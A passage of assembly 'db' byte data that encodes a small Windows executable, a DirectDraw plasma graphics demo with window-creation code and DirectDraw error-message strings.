db 061h,088h,018h,076h,073h,088h,052h,069h,063h,068h,019h,076h,073h,088h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,050h,045h,000h,000h,04Ch,001h
|
||
db 003h,000h,034h,01Fh,096h,038h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 0E0h,000h,00Fh,001h,00Bh,001h,006h,000h,000h,006h,000h,000h,000h,014h
|
||
db 000h,000h,000h,000h,000h,000h,000h,010h,000h,000h,000h,010h,000h,000h
|
||
db 000h,020h,000h,000h,000h,000h,040h,000h,000h,010h,000h,000h,000h,002h
|
||
db 000h,000h,004h,000h,000h,000h,000h,000h,000h,000h,004h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,040h,000h,000h,000h,004h,000h,000h,000h,000h
|
||
db 000h,000h,002h,000h,000h,000h,000h,000h,010h,000h,000h,010h,000h,000h
|
||
db 000h,000h,010h,000h,000h,010h,000h,000h,000h,000h,000h,000h,010h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,054h,020h,000h,000h
|
||
db 064h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,020h,000h,000h,054h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,02Eh,074h,065h,078h,074h,000h,000h,000h,09Ah,005h
|
||
db 000h,000h,000h,010h,000h,000h,000h,006h,000h,000h,000h,004h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,020h,000h
|
||
db 000h,060h,02Eh,072h,064h,061h,074h,061h,000h,000h,056h,002h,000h,000h
|
||
db 000h,020h,000h,000h,000h,004h,000h,000h,000h,00Ah,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,040h,000h,000h,040h
|
||
db 02Eh,064h,061h,074h,061h,000h,000h,000h,04Ch,00Eh,000h,000h,000h,030h
|
||
db 000h,000h,000h,002h,000h,000h,000h,00Eh,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,040h,000h,000h,0C0h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,06Ah,000h,0E8h,039h,005h,000h,000h,06Ah,00Ah,06Ah,000h,06Ah
|
||
db 000h,050h,0E8h,0ADh,001h,000h,000h,050h,0E8h,021h,005h,000h,000h,053h
|
||
db 056h,057h,0B9h,0C8h,000h,000h,000h,08Bh,03Dh,000h,032h,040h,000h,051h
|
||
db 057h,08Bh,035h,0A0h,030h,040h,000h,08Bh,015h,0A4h,030h,040h,000h,02Bh
|
||
db 0F1h,081h,0E2h,0FFh,000h,000h,000h,081h,0E6h,0FFh,000h,000h,000h,08Bh
|
||
db 014h,095h,04Ch,03Ah,040h,000h,08Bh,034h,0B5h,04Ch,036h,040h,000h,02Bh
|
||
db 0D1h,0B9h,040h,001h,000h,000h,081h,0E6h,0FFh,000h,000h,000h,081h,0E2h
|
||
db 0FFh,000h,000h,000h,08Bh,004h,0B5h,04Ch,036h,040h,000h,08Bh,01Ch,095h
|
||
db 04Ch,03Ah,040h,000h,003h,0C3h,083h,0C6h,001h,0D1h,0E8h,083h,0C2h,0FEh
|
||
db 025h,0FFh,000h,000h,000h,083h,0C7h,004h,08Bh,004h,085h,04Ch,032h,040h
|
||
db 000h,049h,089h,047h,0FCh,075h,0C7h,05Fh,059h,003h,03Dh,0ECh,031h,040h
|
||
db 000h,049h,075h,08Bh,083h,005h,0A0h,030h,040h,000h,0FEh,083h,005h,0A4h
|
||
db 030h,040h,000h,0FFh,05Fh,05Eh,05Bh,0C3h,055h,08Bh,0ECh,083h,0C4h,0ECh
|
||
db 0C7h,045h,0FCh,000h,000h,000h,000h,0E9h,0F1h,000h,000h,000h,08Bh,055h
|
||
db 0FCh,0D9h,0EBh,0DAh,04Dh,0FCh,0D8h,00Dh,0B4h,030h,040h,000h,0D8h,035h
|
||
db 0BCh,030h,040h,000h,0D9h,0FEh,0D8h,00Dh,0B8h,030h,040h,000h,0D8h,005h
|
||
db 0B8h,030h,040h,000h,0DBh,01Ch,095h,04Ch,036h,040h,000h,0D9h,0EBh,0DAh
|
||
db 04Dh,0FCh,0D8h,00Dh,0B4h,030h,040h,000h,0D8h,035h,0BCh,030h,040h,000h
|
||
db 0D9h,0FFh,0D8h,00Dh,0B8h,030h,040h,000h,0D8h,005h,0B8h,030h,040h,000h
|
||
db 0D9h,0EBh,0DEh,0C9h,0D8h,00Dh,0B4h,030h,040h,000h,0D8h,035h,0BCh,030h
|
||
db 040h,000h,0D9h,0FEh,0D8h,00Dh,0B8h,030h,040h,000h,0D8h,005h,0B8h,030h
|
||
db 040h,000h,0DBh,01Ch,095h,04Ch,03Ah,040h,000h,033h,0C0h,0D9h,0EBh,0DAh
|
||
db 04Dh,0FCh,0D8h,00Dh,0B4h,030h,040h,000h,0D8h,035h,0A8h,030h,040h,000h
|
||
db 0D9h,0FFh,0D8h,00Dh,0B8h,030h,040h,000h,0D8h,005h,0B8h,030h,040h,000h
|
||
db 0DBh,05Dh,0ECh,0C1h,0E0h,008h,00Bh,045h,0ECh,0D9h,0EBh,0DAh,04Dh,0FCh
|
||
db 0D8h,00Dh,0B4h,030h,040h,000h,0D8h,035h,0ACh,030h,040h,000h,0D9h,0FFh
|
||
db 0D8h,00Dh,0B8h,030h,040h,000h,0D8h,005h,0B8h,030h,040h,000h,0DBh,05Dh
|
||
db 0ECh,0C1h,0E0h,008h,00Bh,045h,0ECh,0D9h,0EBh,0DAh,04Dh,0FCh,0D8h,00Dh
|
||
db 0B4h,030h,040h,000h,0D8h,035h,0B0h,030h,040h,000h,0D9h,0FFh,0D8h,00Dh
|
||
db 0B8h,030h,040h,000h,0D8h,005h,0B8h,030h,040h,000h,0DBh,05Dh,0ECh,0C1h
|
||
db 0E0h,008h,00Bh,045h,0ECh,089h,004h,095h,04Ch,032h,040h,000h,0FFh,045h
|
||
db 0FCh,081h,07Dh,0FCh,000h,001h,000h,000h,00Fh,082h,002h,0FFh,0FFh,0FFh
|
||
db 0C9h,0C3h,055h,08Bh,0ECh,083h,0C4h,0E4h,08Bh,045h,008h,0A3h,0E6h,030h
|
||
db 040h,000h,06Ah,004h,0E8h,05Fh,003h,000h,000h,0A3h,0F2h,030h,040h,000h
|
||
db 068h,0D2h,030h,040h,000h,0E8h,092h,003h,000h,000h,06Ah,000h,0FFh,075h
|
||
db 008h,06Ah,000h,06Ah,000h,068h,0C8h,000h,000h,000h,068h,040h,001h,000h
|
||
db 000h,06Ah,000h,06Ah,000h,068h,000h,000h,000h,080h,068h,0C0h,030h,040h
|
||
db 000h,068h,0C0h,030h,040h,000h,06Ah,000h,0E8h,035h,003h,000h,000h,0A3h
|
||
db 0D0h,031h,040h,000h,0FFh,035h,0D0h,031h,040h,000h,0E8h,05Bh,003h,000h
|
||
db 000h,06Ah,000h,0E8h,05Ah,003h,000h,000h,06Ah,000h,068h,0D4h,031h,040h
|
||
db 000h,06Ah,000h,0E8h,05Eh,003h,000h,000h,00Bh,0C0h,074h,01Eh,06Ah,000h
|
||
db 068h,0C0h,030h,040h,000h,068h,002h,031h,040h,000h,0FFh,035h,0D0h,031h
|
||
db 040h,000h,0E8h,013h,003h,000h,000h,06Ah,000h,0E8h,0E2h,002h,000h,000h
|
||
db 0A1h,0D4h,031h,040h,000h,08Bh,000h,06Ah,011h,0FFh,035h,0D0h,031h,040h
|
||
db 000h,0FFh,035h,0D4h,031h,040h,000h,0FFh,050h,050h,00Bh,0C0h,074h,01Eh
|
||
db 06Ah,000h,068h,0C0h,030h,040h,000h,068h,01Bh,031h,040h,000h,0FFh,035h
|
||
db 0D0h,031h,040h,000h,0E8h,0D9h,002h,000h,000h,06Ah,000h,0E8h,0A8h,002h
|
||
db 000h,000h,0A1h,0D4h,031h,040h,000h,08Bh,000h,06Ah,020h,068h,0C8h,000h
|
||
db 000h,000h,068h,040h,001h,000h,000h,0FFh,035h,0D4h,031h,040h,000h,0FFh
|
||
db 050h,054h,00Bh,0C0h,074h,01Eh,06Ah,000h,068h,0C0h,030h,040h,000h,068h
|
||
db 045h,031h,040h,000h,0FFh,035h,0D0h,031h,040h,000h,0E8h,09Bh,002h,000h
|
||
db 000h,06Ah,000h,0E8h,06Ah,002h,000h,000h,0C7h,005h,0DCh,031h,040h,000h
|
||
db 06Ch,000h,000h,000h,0C7h,005h,0E0h,031h,040h,000h,001h,000h,000h,000h
|
||
db 0C7h,005h,044h,032h,040h,000h,000h,002h,000h,000h,0A1h,0D4h,031h,040h
|
||
db 000h,08Bh,000h,06Ah,000h,068h,0D8h,031h,040h,000h,068h,0DCh,031h,040h
|
||
db 000h,0FFh,035h,0D4h,031h,040h,000h,0FFh,050h,018h,00Bh,0C0h,074h,01Eh
|
||
db 06Ah,000h,068h,0C0h,030h,040h,000h,068h,05Fh,031h,040h,000h,0FFh,035h
|
||
db 0D0h,031h,040h,000h,0E8h,03Fh,002h,000h,000h,06Ah,000h,0E8h,00Eh,002h
|
||
db 000h,000h,0FFh,075h,014h,0FFh,035h,0D0h,031h,040h,000h,0E8h,04Eh,002h
|
||
db 000h,000h,0E8h,06Fh,0FDh,0FFh,0FFh,06Ah,001h,06Ah,000h,06Ah,000h,06Ah
|
||
db 000h,08Dh,045h,0E4h,050h,0E8h,01Ah,002h,000h,000h,00Bh,0C0h,074h,02Fh
|
||
db 083h,07Dh,0E8h,012h,075h,012h,0FFh,075h,0ECh,0E8h,00Eh,002h,000h,000h
|
||
db 0E9h,0D0h,000h,000h,000h,0E9h,0C6h,000h,000h,000h,08Dh,045h,0E4h,050h
|
||
db 0E8h,019h,002h,000h,000h,08Dh,045h,0E4h,050h,0E8h,0DAh,001h,000h,000h
|
||
db 0E9h,0AFh,000h,000h,000h,0E8h,0D6h,001h,000h,000h,03Bh,005h,0D0h,031h
|
||
db 040h,000h,00Fh,085h,09Eh,000h,000h,000h,0C7h,005h,0DCh,031h,040h,000h
|
||
db 06Ch,000h,000h,000h,0C7h,005h,0E0h,031h,040h,000h,008h,000h,000h,000h
|
||
db 0A1h,0D8h,031h,040h,000h,08Bh,000h,06Ah,000h,06Ah,001h,068h,0DCh,031h
|
||
db 040h,000h,06Ah,000h,0FFh,035h,0D8h,031h,040h,000h,0FFh,050h,064h,00Bh
|
||
db 0C0h,074h,039h,03Dh,0C2h,001h,076h,088h,075h,012h,0A1h,0D8h,031h,040h
|
||
db 000h,08Bh,000h,0FFh,035h,0D8h,031h,040h,000h,0FFh,050h,06Ch,0EBh,01Eh
|
||
db 06Ah,000h,068h,0C0h,030h,040h,000h,068h,07Fh,031h,040h,000h,0FFh,035h
|
||
db 0D0h,031h,040h,000h,0E8h,06Dh,001h,000h,000h,06Ah,000h,0E8h,03Ch,001h
|
||
db 000h,000h,0EBh,0A8h,0A1h,0D4h,031h,040h,000h,08Bh,000h,06Ah,000h,06Ah
|
||
db 001h,0FFh,035h,0D4h,031h,040h,000h,0FFh,050h,058h,0E8h,000h,0FCh,0FFh
|
||
db 0FFh,0A1h,0D8h,031h,040h,000h,08Bh,000h,0FFh,035h,000h,032h,040h,000h
|
||
db 0FFh,035h,0D8h,031h,040h,000h,0FFh,090h,080h,000h,000h,000h,0E9h,008h
|
||
db 0FFh,0FFh,0FFh,0A1h,0D4h,031h,040h,000h,08Bh,000h,0FFh,035h,0D4h,031h
|
||
db 040h,000h,0FFh,050h,04Ch,00Bh,0C0h,074h,01Eh,06Ah,000h,068h,0C0h,030h
|
||
db 040h,000h,068h,095h,031h,040h,000h,0FFh,035h,0D0h,031h,040h,000h,0E8h
|
||
db 002h,001h,000h,000h,06Ah,000h,0E8h,0D1h,000h,000h,000h,0FFh,035h,0D0h
|
||
db 031h,040h,000h,0E8h,0DEh,000h,000h,000h,00Bh,0C0h,075h,01Eh,06Ah,000h
|
||
db 068h,0C0h,030h,040h,000h,068h,0B2h,031h,040h,000h,0FFh,035h,0D0h,031h
|
||
db 040h,000h,0E8h,0D5h,000h,000h,000h,06Ah,000h,0E8h,0A4h,000h,000h,000h
|
||
db 083h,03Dh,0D4h,031h,040h,000h,000h,074h,03Dh,083h,03Dh,0D8h,031h,040h
|
||
db 000h,000h,074h,01Ah,0A1h,0D8h,031h,040h,000h,08Bh,000h,0FFh,035h,0D8h
|
||
db 031h,040h,000h,0FFh,050h,008h,0C7h,005h,0D8h,031h,040h,000h,000h,000h
|
||
db 000h,000h,0A1h,0D4h,031h,040h,000h,08Bh,000h,0FFh,035h,0D4h,031h,040h
|
||
db 000h,0FFh,050h,008h,0C7h,005h,0D4h,031h,040h,000h,000h,000h,000h,000h
|
||
db 08Bh,045h,0ECh,0C9h,0C9h,0C2h,010h,000h,055h,08Bh,0ECh,081h,07Dh,00Ch
|
||
db 000h,001h,000h,000h,075h,018h,083h,07Dh,010h,01Bh,075h,028h,06Ah,000h
|
||
db 0E8h,073h,000h,000h,000h,0B8h,000h,000h,000h,000h,0C9h,0C2h,010h,000h
|
||
db 0EBh,016h,083h,07Dh,00Ch,002h,075h,010h,06Ah,000h,0E8h,05Bh,000h,000h
|
||
db 000h,0B8h,000h,000h,000h,000h,0C9h,0C2h,010h,000h,0FFh,075h,014h,0FFh
|
||
db 075h,010h,0FFh,075h,00Ch,0FFh,075h,008h,0E8h,01Dh,000h,000h,000h,0C9h
|
||
db 0C2h,010h,000h,0CCh,0FFh,025h,008h,020h,040h,000h,0FFh,025h,014h,020h
|
||
db 040h,000h,0FFh,025h,010h,020h,040h,000h,0FFh,025h,028h,020h,040h,000h
|
||
db 0FFh,025h,020h,020h,040h,000h,0FFh,025h,01Ch,020h,040h,000h,0FFh,025h
|
||
db 02Ch,020h,040h,000h,0FFh,025h,04Ch,020h,040h,000h,0FFh,025h,024h,020h
|
||
db 040h,000h,0FFh,025h,030h,020h,040h,000h,0FFh,025h,048h,020h,040h,000h
|
||
db 0FFh,025h,034h,020h,040h,000h,0FFh,025h,038h,020h,040h,000h,0FFh,025h
|
||
db 03Ch,020h,040h,000h,0FFh,025h,040h,020h,040h,000h,0FFh,025h,044h,020h
|
||
db 040h,000h,0FFh,025h,000h,020h,040h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,038h,022h
|
||
db 000h,000h,000h,000h,000h,000h,00Ch,021h,000h,000h,000h,000h,000h,000h
|
||
db 036h,021h,000h,000h,028h,021h,000h,000h,000h,000h,000h,000h,07Ch,021h
|
||
db 000h,000h,06Ah,021h,000h,000h,0ACh,021h,000h,000h,058h,021h,000h,000h
|
||
db 08Ch,021h,000h,000h,0BAh,021h,000h,000h,0DCh,021h,000h,000h,0F0h,021h
|
||
db 000h,000h,0FCh,021h,000h,000h,00Ah,022h,000h,000h,018h,022h,000h,000h
|
||
db 0CAh,021h,000h,000h,0A0h,021h,000h,000h,000h,000h,000h,000h,0C0h,020h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,01Eh,021h,000h,000h
|
||
db 008h,020h,000h,000h,0C8h,020h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,04Ah,021h,000h,000h,010h,020h,000h,000h,0D4h,020h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,02Ch,022h,000h,000h,01Ch,020h
|
||
db 000h,000h,0B8h,020h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 04Ch,022h,000h,000h,000h,020h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 038h,022h,000h,000h,000h,000h,000h,000h,00Ch,021h,000h,000h,000h,000h
|
||
db 000h,000h,036h,021h,000h,000h,028h,021h,000h,000h,000h,000h,000h,000h
|
||
db 07Ch,021h,000h,000h,06Ah,021h,000h,000h,0ACh,021h,000h,000h,058h,021h
|
||
db 000h,000h,08Ch,021h,000h,000h,0BAh,021h,000h,000h,0DCh,021h,000h,000h
|
||
db 0F0h,021h,000h,000h,0FCh,021h,000h,000h,00Ah,022h,000h,000h,018h,022h
|
||
db 000h,000h,0CAh,021h,000h,000h,0A0h,021h,000h,000h,000h,000h,000h,000h
|
||
db 021h,001h,047h,065h,074h,053h,074h,06Fh,063h,06Bh,04Fh,062h,06Ah,065h
|
||
db 063h,074h,000h,000h,047h,044h,049h,033h,032h,02Eh,064h,06Ch,06Ch,000h
|
||
db 075h,000h,045h,078h,069h,074h,050h,072h,06Fh,063h,065h,073h,073h,000h
|
||
db 011h,001h,047h,065h,074h,04Dh,06Fh,064h,075h,06Ch,065h,048h,061h,06Eh
|
||
db 064h,06Ch,065h,041h,000h,000h,04Bh,045h,052h,04Eh,045h,04Ch,033h,032h
|
||
db 02Eh,064h,06Ch,06Ch,000h,000h,058h,000h,043h,072h,065h,061h,074h,065h
|
||
db 057h,069h,06Eh,064h,06Fh,077h,045h,078h,041h,000h,083h,000h,044h,065h
|
||
db 066h,057h,069h,06Eh,064h,06Fh,077h,050h,072h,06Fh,063h,041h,000h,000h
|
||
db 08Dh,000h,044h,065h,073h,074h,072h,06Fh,079h,057h,069h,06Eh,064h,06Fh
|
||
db 077h,000h,094h,000h,044h,069h,073h,070h,061h,074h,063h,068h,04Dh,065h
|
||
db 073h,073h,061h,067h,065h,041h,000h,000h,005h,001h,047h,065h,074h,046h
|
||
db 06Fh,063h,075h,073h,000h,000h,0BBh,001h,04Dh,065h,073h,073h,061h,067h
|
||
db 065h,042h,06Fh,078h,041h,000h,0D9h,001h,050h,065h,065h,06Bh,04Dh,065h
|
||
db 073h,073h,061h,067h,065h,041h,000h,000h,0DDh,001h,050h,06Fh,073h,074h
|
||
db 051h,075h,069h,074h,04Dh,065h,073h,073h,061h,067h,065h,000h,0EFh,001h
|
||
db 052h,065h,067h,069h,073h,074h,065h,072h,043h,06Ch,061h,073h,073h,045h
|
||
db 078h,041h,000h,000h,02Bh,002h,053h,065h,074h,046h,06Fh,063h,075h,073h
|
||
db 000h,000h,061h,002h,053h,068h,06Fh,077h,043h,075h,072h,073h,06Fh,072h
|
||
db 000h,000h,065h,002h,053h,068h,06Fh,077h,057h,069h,06Eh,064h,06Fh,077h
|
||
db 000h,000h,07Dh,002h,054h,072h,061h,06Eh,073h,06Ch,061h,074h,065h,04Dh
|
||
db 065h,073h,073h,061h,067h,065h,000h,000h,055h,053h,045h,052h,033h,032h
|
||
db 02Eh,064h,06Ch,06Ch,000h,000h,005h,000h,044h,069h,072h,065h,063h,074h
|
||
db 044h,072h,061h,077h,043h,072h,065h,061h,074h,065h,000h,000h,044h,044h
|
||
db 052h,041h,057h,02Eh,064h,06Ch,06Ch,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 0E0h,00Eh,0B7h,0D7h,040h,043h,0CFh,011h,0B0h,063h,000h,020h,0AFh,0C2h
|
||
db 0CDh,035h,0A0h,017h,038h,059h,0B3h,07Dh,0CFh,011h,0A2h,0DEh,000h,0AAh
|
||
db 000h,0B9h,033h,056h,080h,0DBh,014h,06Ch,033h,0A7h,0CEh,011h,0A5h,021h
|
||
db 000h,020h,0AFh,00Bh,0E5h,060h,0E0h,0F3h,0A6h,0B3h,043h,02Bh,0CFh,011h
|
||
db 0A2h,0DEh,000h,0AAh,000h,0B9h,033h,056h,081h,0DBh,014h,06Ch,033h,0A7h
|
||
db 0CEh,011h,0A5h,021h,000h,020h,0AFh,00Bh,0E5h,060h,085h,058h,080h,057h
|
||
db 0ECh,06Eh,0CFh,011h,094h,041h,0A8h,023h,003h,0C1h,00Eh,027h,000h,04Eh
|
||
db 004h,0DAh,0B2h,069h,0D0h,011h,0A1h,0D5h,000h,0AAh,000h,0B8h,0DFh,0BBh
|
||
db 084h,0DBh,014h,06Ch,033h,0A7h,0CEh,011h,0A5h,021h,000h,020h,0AFh,00Bh
|
||
db 0E5h,060h,085h,0DBh,014h,06Ch,033h,0A7h,0CEh,011h,0A5h,021h,000h,020h
|
||
db 0AFh,00Bh,0E5h,060h,0E0h,00Eh,09Fh,04Bh,07Eh,00Dh,0D0h,011h,09Bh,006h
|
||
db 000h,0A0h,0C9h,003h,0A3h,0B8h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,0FAh,043h,000h,000h,0A0h,043h,000h,000h,0BAh,043h,000h,000h
|
||
db 000h,040h,000h,000h,0FFh,042h,000h,000h,080h,043h,044h,044h,052h,041h
|
||
db 057h,020h,050h,06Ch,061h,073h,06Dh,061h,020h,044h,065h,06Dh,06Fh,000h
|
||
db 030h,000h,000h,000h,003h,000h,000h,000h,0E4h,014h,040h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,0C0h,030h
|
||
db 040h,000h,000h,000h,000h,000h,043h,06Fh,075h,06Ch,064h,06Eh,027h,074h
|
||
db 020h,069h,06Eh,069h,074h,020h,044h,069h,072h,065h,063h,074h,044h,072h
|
||
db 061h,077h,000h,043h,06Fh,075h,06Ch,064h,06Eh,027h,074h,020h,073h,065h
|
||
db 074h,020h,044h,069h,072h,065h,063h,074h,044h,072h,061h,077h,020h,063h
|
||
db 06Fh,06Fh,070h,065h,072h,061h,074h,069h,076h,065h,020h,06Ch,065h,076h
|
||
db 065h,06Ch,000h,043h,06Fh,075h,06Ch,064h,06Eh,027h,074h,020h,073h,065h
|
||
db 074h,020h,064h,069h,073h,070h,06Ch,061h,079h,020h,06Dh,06Fh,064h,065h
|
||
db 000h,043h,06Fh,075h,06Ch,064h,06Eh,027h,074h,020h,063h,072h,065h,061h
|
||
db 074h,065h,020h,070h,072h,069h,06Dh,061h,072h,079h,020h,073h,075h,072h
|
||
db 066h,061h,063h,065h,000h,043h,06Fh,075h,06Ch,064h,06Eh,027h,074h,020h
|
||
db 06Ch,06Fh,063h,06Bh,020h,073h,075h,072h,066h,061h,063h,065h,000h,043h
|
||
db 06Fh,075h,06Ch,064h,06Eh,027h,074h,020h,072h,065h,073h,074h,06Fh,072h
|
||
db 065h,020h,064h,069h,073h,070h,06Ch,061h,079h,06Dh,06Fh,064h,065h,000h
|
||
db 043h,06Fh,075h,06Ch,064h,06Eh,027h,074h,020h,064h,065h,073h,074h,072h
|
||
db 06Fh,079h,020h,077h,069h,06Eh,064h,06Fh,077h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
